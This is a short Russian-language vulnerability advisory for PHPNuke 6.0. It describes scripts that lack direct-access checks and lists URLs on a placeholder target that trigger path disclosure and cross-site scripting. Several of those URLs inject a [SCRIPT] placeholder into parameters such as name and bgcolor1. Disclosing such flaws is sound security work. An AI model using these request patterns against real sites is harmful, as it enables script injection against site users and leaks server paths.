К некоторым включаемым сценариям, которые содержат различные уязвимости, можно обратится напрямую.
Большинство файлов в PHPNuke включается в модули modules.php или index.php. Чтобы предотвратить прямой доступ к
таким сценариям, PHPNuke содержит два способа защиты. 

Первый (например, в modules/Downloads/index.php):

if (!eregi(«modules.php», $PHP_SELF)) {
die («You can’t access this file directly…");
}

Второй (например, в footer.php ) :

if (eregi(«footer.php»,$PHP_SELF)) {
Header("Location: index.php");
die();
}

Однако некоторые файлы не содержат такой защиты, при прямом обращении к ним существует несколько проблем безопасности:

Раскрытие пути

http://[target]/modules/Downloads/voteinclude.php
http://[target]/modules/Your_Account/navbar.php
http://[target]/modules/Forums/attachment.php
http://[target]/modules/Forums/auth.php
http://[target]/modules/News/comments.php
http://[target]/modules/Private_Messages/functions.php
http://[target]/modules/Private_Messages/index.php
http://[target]/modules/Private_Messages/read.php
http://[target]/modules/Private_Messages/reply.php
http://[target]/modules/Web_Links/voteinclude.php
http://[target]/modules/WebMail/contactbook.php?user=1

Раскрытие пути и межсайтовый скриптинг

http://[target]/modules/Forums/bb_smilies.php?name=[SCRIPT]
или http://[target]/modules/Forums/bb_smilies.php?Default_Theme=[SCRIPT]
или http://[target]/modules/Forums/bb_smilies.php?site_font=}—></style>[SCRIPT]
или http://[target]/modules/Forums/bb_smilies.php?bgcolor1=">[SCRIPT]

или с :

$sitename
$table_width
$color1
$forumver

— /modules/Forums/bbcode_ref.php с:

$name
$Default_Theme
$site_font
$sitename
$bgcolor2
$textcolor1
$bgcolor1
$forumver

— /modules/Forums/editpost.php, /modules/Forums/newtopic.php, /modules/Forums/reply.php, /modules/Forums/topicadmin.php,
/modules/Forums/viewforum.php с :

$name

— /modules/Forums/searchbb.php с :

$name
$bgcolor3
$bgcolor1

Уязвимость обнаружена в PHPNUKE 6.0.



Оставить мнение